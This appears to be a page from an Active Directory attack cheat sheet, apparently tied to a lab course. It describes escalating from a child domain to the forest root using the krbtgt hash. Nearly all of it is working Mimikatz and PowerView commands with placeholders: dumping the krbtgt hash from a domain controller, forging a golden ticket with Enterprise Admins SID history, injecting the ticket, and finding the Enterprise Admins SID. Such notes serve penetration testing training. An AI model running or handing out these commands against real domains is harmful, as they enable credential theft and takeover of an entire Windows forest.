Child to parent - krbtgt hash

Get krbtgt hash from dc

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Create TGT

the mimikatz option /sids is forcefully setting the SID history for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /sids:<sids> /krbtgt:<hash> /ticket:<path to save ticket>"'

Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <path to ticket>"'

Get SID of enterprise admin

Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData | select samaccountname, objectsid

PreviousChild to parent - Trust tickets NextCrossforest attacks

Last updated 2 years ago

Was this helpful?